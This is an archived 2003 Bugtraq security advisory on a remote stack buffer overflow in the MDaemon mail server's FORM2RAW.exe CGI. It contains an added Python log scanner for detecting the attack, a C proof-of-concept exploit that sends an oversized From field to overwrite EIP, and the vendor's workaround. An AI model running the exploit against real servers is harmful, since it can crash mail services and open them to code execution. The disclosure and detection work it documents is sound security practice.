lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <20031229195721.29292.qmail@sf-www3-symnsj.securityfocus.com>
Date: 29 Dec 2003 19:57:21 -0000
From: Hat-Squad Security Team <service@...-squad.com>
To: bugtraq@...urityfocus.com
Subject: [Hat-Squad] Remote buffer overflow in Mdaemon Raw message Handler




			Hat-Squad Security Team Advisory
			    http://www.hat-squad.com

Product: Alt-N Technologies Mdaemon Mail Server
Version: MDaemon 6.85 and below, down to 6.52
Vulnerability: Remote buffer overflow in Raw Message Handler
Release Date: 12/29/2003

Vendor Status: 
Informed on 29 Dec 2003
Quick response on 29 Dec 2003

Overview:

FORM2RAW.exe is a CGI that allows users to send email through MDaemon from a web page. It processes the fields of an HTML form and creates a RAW message file in the Raw queue directory of the MDaemon mail server. This file is then processed and queued for delivery by MDaemon.
According to the Help file: "By default, MDaemon 6.52 or higher will not send emails created by Form2Raw unless the email address passed in the 'from' tag (see below) is a valid account on the MDaemon server. If you want to disable this behavior you can set FromCheck=No in the FORM2RAW.INI file".

Problem:

Sending more than 153 bytes in the "From" field to FORM2RAW.exe creates a RAW file that, when processed by MDaemon, causes a stack buffer overflow. The EIP register is overwritten when the From field is 249 bytes long.
FORM2RAW.exe is accessible by default through the WorldClient web server listening on port 3000.
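As an added defender-side example (not part of the original advisory), the Python below scans web-server request logs for Form2Raw requests whose From field exceeds the 153-byte threshold stated above. The Common Log Format layout and the sample lines are constructed assumptions; WorldClient's own log format may differ, so adjust LOG_RE accordingly.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Threshold from the advisory: more than 153 bytes in the From field yields a
# RAW file that overflows a stack buffer when MDaemon processes it (EIP at 249).
FROM_LIMIT = 153

# Constructed sample log lines (assumed Common Log Format, not WorldClient's own).
# The second line carries the 249-byte From value described in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Dec/2003:19:57:21 +0000] "GET /form2raw.cgi?From=alice@example.org&To=bob@example.org&Subject=hi&Body=hello HTTP/1.0" 200 0
10.0.0.9 - - [29/Dec/2003:19:58:02 +0000] "GET /form2raw.cgi?From={a}&To=me@example.org&Subject=hi&Body=hello HTTP/1.0" 200 0
10.0.0.7 - - [29/Dec/2003:19:58:30 +0000] "GET /WorldClient.dll?View=Main HTTP/1.0" 200 512
""".format(a="a" * 244 + "bbbbc")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def from_field_length(target):
    """Return the decoded byte length of the From parameter of a Form2Raw
    request target, or None when the request is not for form2raw.cgi."""
    parts = urlsplit(target)
    if parts.path.lower() != "/form2raw.cgi":
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    # The CGI documents the tag as 'from'; accept any letter case.
    values = [v for k, vs in params.items() if k.lower() == "from" for v in vs]
    # Measure bytes after URL decoding, since that is what lands in the RAW file.
    return max((len(v.encode("latin-1", "replace")) for v in values), default=0)


def find_oversized_from(log_text, limit=FROM_LIMIT):
    """Return (ip, timestamp, length) for every Form2Raw request whose From
    field is longer than the limit; such requests merit investigation."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        length = from_field_length(m.group("target"))
        if length is not None and length > limit:
            hits.append((m.group("ip"), m.group("ts"), length))
    return hits


if __name__ == "__main__":
    for ip, ts, length in find_oversized_from(SAMPLE_LOG):
        print(f"{ts} {ip} form2raw.cgi From field {length} bytes (> {FROM_LIMIT})")
```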

---------------------Exploit:

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment (lib,"ws2_32")

#define RET 0x1dff160   /* not used by this proof of concept; EIP is simply overwritten with "bbbb" */
#define PORT 3000       /* WorldClient web server port */

int main(int argc, char **argv)
{
     SOCKET s = 0;
     WSADATA wsaData;

     if(argc < 2)
     {
          fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, "
                          "\nUsage: %s <target ip> \n", argv[0]);
          exit(0);
     }

     WSAStartup(MAKEWORD(2,0), &wsaData);

     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

     if(INVALID_SOCKET != s)
     {
          SOCKADDR_IN anAddr;
          anAddr.sin_family = AF_INET;
          anAddr.sin_port = htons(PORT);
          anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

          if(0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr)))
          {
               static char buffer[500];
               int i;
               memset(buffer, 0, sizeof(buffer));
               strcpy(buffer, "get /form2raw.cgi?From=");
               /* 244 filler bytes, then 4 bytes that land on the saved EIP: 249 bytes in total */
               for(i = 0; i < 244; i++) {
                    strcat(buffer, "a");
               }

               strcat(buffer, "bbbb"); /* Overwrites EIP */
               strcat(buffer, "c");    /* One byte left after ESP :-( */
               strcat(buffer, "&To=me@...l.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

               send(s, buffer, strlen(buffer), 0);
               printf("Exploit Sent.");
          }
          else printf("Error Connecting to The Target.\n");

          closesocket(s);
     }

     WSACleanup();
     return 0;
}

---------------------------------------

Vendor Response:

Robin Edwards <support@...pdesk.altn.com> wrote:

We have had a similar vulnerability report with Form2Raw and hope to release a patch soon.  In the meantime it is easy to disable Form2Raw by following the instructions below:
-----
To disable FORM2RAW open the 
\MDaemon\WorldClient\WorldClient.ini file with Notepad and 
delete the following two lines:

CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
 
Afterward, restart WorldClient to register the change.
-----


Credits:

This vulnerability was discovered by Pejman Davarzani (pejman@...-squad.com) and Behrang Fouladi (behrang@...-squad.com).


The original advisory can be found at:
http://hat-squad.com/bugreport/mdaemon-raw.txt

